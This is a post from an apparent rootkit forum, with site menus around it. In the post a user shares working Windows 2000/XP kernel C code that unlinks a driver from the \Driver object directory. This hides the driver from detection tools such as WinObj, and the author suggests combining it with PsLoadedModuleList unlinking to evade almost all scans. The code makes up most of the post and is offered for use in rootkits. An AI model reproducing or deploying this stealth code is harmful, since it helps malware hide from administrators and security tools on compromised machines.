main menuhome
forums
Show me new threads!
bookmarks
view blogs
vault you must be level 2 to upload files to your vault
downloads you must be logged on, and level 1, to access downloads
Rootkit Collection
A news back-end to implement RootKit news into your website is here or more advanced version here.
An XML/RSS feed that includes both NEWS and BLOGS for RootKit is here: XML/RSS.
![[Valid RSS]](valid-rss.png "Validate my RSS feed")
Beta feed for replied posts here. feedback to admins not forums, we know about times being off...
|
ROOTKIT
First to set up camp.
|
Thursday September 02nd |
| | Featured Article: Nostalgia: n00bk1t, an advanced ring3 rootkit in C by jeffosz | How to properly hide a driver from the Object Directory with *NO HOOKS*
By: valerinoHeya,
it's me again :)
This time i present you a technique to *properly* and fully hiding a kernel mode driver from the tools which
(until now) could detect every running driver (at least, the driver i find here). Combined with PsLoadedModuleList
technique, it could be enough to hide from almost everything.
These tools (winobj,devicetree,devfilter, to name some )
simply parse the object manager via ZwQueryObjectDirectory, so a simple hook (it's trivial and
fully documented if you search on google) could do the job easily.
But hooks are lame, so we need a more l3333t solution,ain't it ? :)
Solution is to avoid hook and simply mangle the list as we usually do with PsLoadedModuleList
(but with PsLoadedModuleList your driver is *not* hidden from directory object scans, unfortunately.....).
How to do ? After some hours of work, here's the code :
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/*********************************************************************
needed stuff found on the internet (i guess they're coming from NT sources ?!)
*********************************************************************/
#define NUMBER_HASH_BUCKETS 37
typedef struct _OBJECT_DIRECTORY_ENTRY {
struct _OBJECT_DIRECTORY_ENTRY *ChainLink;
PVOID Object;
} OBJECT_DIRECTORY_ENTRY, *POBJECT_DIRECTORY_ENTRY;
typedef struct _OBJECT_DIRECTORY {
struct _OBJECT_DIRECTORY_ENTRY *HashBuckets[ NUMBER_HASH_BUCKETS ];
struct _OBJECT_DIRECTORY_ENTRY **LookupBucket;
BOOLEAN LookupFound;
USHORT SymbolicLinkUsageCount;
struct _DEVICE_MAP *DeviceMap;
} OBJECT_DIRECTORY, *POBJECT_DIRECTORY;
typedef struct _DEVICE_MAP {
ULONG ReferenceCount;
POBJECT_DIRECTORY DosDevicesDirectory;
ULONG DriveMap;
UCHAR DriveType[ 32 ];
} DEVICE_MAP, *PDEVICE_MAP;
typedef struct _OBJECT_HEADER_NAME_INFO {
POBJECT_DIRECTORY Directory;
UNICODE_STRING Name;
ULONG Reserved;
} OBJECT_HEADER_NAME_INFO, *POBJECT_HEADER_NAME_INFO;
#define OBJECT_TO_OBJECT_HEADER( o ) \
CONTAINING_RECORD( (o), OBJECT_HEADER, Body )
#define OBJECT_HEADER_TO_NAME_INFO( oh ) ((POBJECT_HEADER_NAME_INFO) \
((oh)->NameInfoOffset == 0 ? NULL : ((PCHAR)(oh) - (oh)->NameInfoOffset)))
NTSTATUS ObOpenObjectByName (IN POBJECT_ATTRIBUTES ObjectAttributes,
IN POBJECT_TYPE ObjectType OPTIONAL, IN KPROCESSOR_MODE AccessMode,
IN OUT PACCESS_STATE AccessState OPTIONAL, IN ACCESS_MASK DesiredAccess OPTIONAL,
IN OUT PVOID ParseContext OPTIONAL, OUT PHANDLE Handle);
//************************************************************************
// VOID HideFromObjectDirectory()
//
// Hide driver from object directory
//************************************************************************/
VOID StealthInitializeLateMore(VOID)
{
OBJECT_ATTRIBUTES ObjectAttributes;
UNICODE_STRING ucName;
NTSTATUS Status;
HANDLE hDirectory = NULL;
POBJECT_DIRECTORY pDirectoryObject = NULL;
KIRQL OldIrql;
POBJECT_HEADER ObjectHeader;
POBJECT_HEADER_NAME_INFO NameInfo;
POBJECT_DIRECTORY_ENTRY DirectoryEntry;
POBJECT_DIRECTORY_ENTRY DirectoryEntryNext;
POBJECT_DIRECTORY_ENTRY DirectoryEntryTop;
ULONG Bucket = 0;
UNICODE_STRING ObjectName;
BOOLEAN found = FALSE;
// open driver directory in the object directory
RtlInitUnicodeString(&ucName,L"\\Driver");
InitializeObjectAttributes(&ObjectAttributes,&ucName,OBJ_CASE_INSENSITIVE,NULL,NULL);
Status = ObOpenObjectByName(&ObjectAttributes,NULL,KernelMode,NULL,0x80000000,NULL,&hDirectory);
if (!NT_SUCCESS (Status))
goto __exit;
// get pointer from handle
Status = ObReferenceObjectByHandle(hDirectory,FILE_ANY_ACCESS,NULL,KernelMode,&pDirectoryObject,
NULL);
if (!NT_SUCCESS (Status))
goto __exit;
// we raise the irql too to protect the list from being accessed by kernel APC
KeRaiseIrql(APC_LEVEL,&OldIrql);
// walk the object directory
for (Bucket=0; Bucket<NUMBER_HASH_BUCKETS; Bucket++)
{
// are we done yet ?
if (found)
break;
DirectoryEntry = pDirectoryObject->HashBuckets[Bucket];
if (!DirectoryEntry)
continue;
// check if we're at the top of a bucket
ObjectHeader = OBJECT_TO_OBJECT_HEADER( DirectoryEntry->Object );
NameInfo = OBJECT_HEADER_TO_NAME_INFO( ObjectHeader );
if (NameInfo != NULL)
{
ObjectName = NameInfo->Name;
// here you compare the name of the object with the one of your driver (ex: ROOTKIT)
// this function is just my extension to wcsstr, just forget about it .......
if (mywcsstrsize(ObjectName.Buffer,MYDRIVER_NAME,
ObjectName.Length,wcslen (MYDRIVER_NAME)* sizeof (WCHAR)))
{
// get top and next pointers
DirectoryEntryTop = pDirectoryObject->HashBuckets[Bucket];
DirectoryEntryNext = DirectoryEntryTop->ChainLink;
// substitute top
pDirectoryObject->HashBuckets[Bucket] = DirectoryEntryNext;
DirectoryEntryTop = pDirectoryObject->HashBuckets[Bucket];
// walk the chain and shift back the entries by one place
while (DirectoryEntryNext)
{
DirectoryEntryTop->ChainLink = DirectoryEntryNext->ChainLink;
DirectoryEntryTop = DirectoryEntryTop->ChainLink;
DirectoryEntryNext = DirectoryEntryNext->ChainLink;
}
if (DirectoryEntryTop)
DirectoryEntryTop->ChainLink = NULL;
// found
KdPrint (("Object directory entry unlinked OK!\n"));
found = TRUE;
// we can exit safely
break;
}
}
// if we're not at top of a bucket, check the entry->next fields
// for every entry, we check the next
DirectoryEntryNext = DirectoryEntry->ChainLink;
while (DirectoryEntryNext)
{
ObjectHeader = OBJECT_TO_OBJECT_HEADER( DirectoryEntryNext->Object );
NameInfo = OBJECT_HEADER_TO_NAME_INFO( ObjectHeader );
if (NameInfo != NULL)
{
ObjectName = NameInfo->Name;
if (mywcsstrsize(ObjectName.Buffer,MYDRIVER_NAME,
ObjectName.Length,wcslen (MYDRIVER_NAME)* sizeof (WCHAR)))
{
// found our object, now we must unlink it, this time is easy
DirectoryEntry->ChainLink = DirectoryEntryNext->ChainLink;
KdPrint (("Object directory entry unlinked OK!\n"));
found = TRUE;
// exit
break;
}
}
// walk the next entry if any
if (DirectoryEntry)
{
DirectoryEntry = DirectoryEntry->ChainLink;
DirectoryEntryNext = DirectoryEntry->ChainLink;
}
else
{
DirectoryEntryNext = NULL;
}
}
}
// adjust back the irql
KeLowerIrql(OldIrql);
__exit:
// dereference and cleanup
if (pDirectoryObject)
ObDereferenceObject(pDirectoryObject);
if (hDirectory)
ZwClose (hDirectory);
return;
}
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Here we go ..... tested and works on any 2k/XP i've around.... should be enough :)
cowabunga,
valerino
|
| |
ROOTKITS, Subverting the Windows Kernel
By: Greg Hoglund and Jamie Butler
Rootkits are powerful tools to compromise computer systems without detection. Get the original and best book on the subject here.
|
active for last 5 minutes
registered users:80290
There are currently 0 registered users and 29 guests browsing the website.
Welcome our latest registered user: samel
| Aug 24, 04:27 |
| Aug 16, 04:49 |
| Aug 13, 16:44 |
| Aug 09, 15:25 |
| Aug 05, 15:52 |
| Best Screenshots / Analog |
| the most active news users |
based on the number of news posts for last 30 days
|
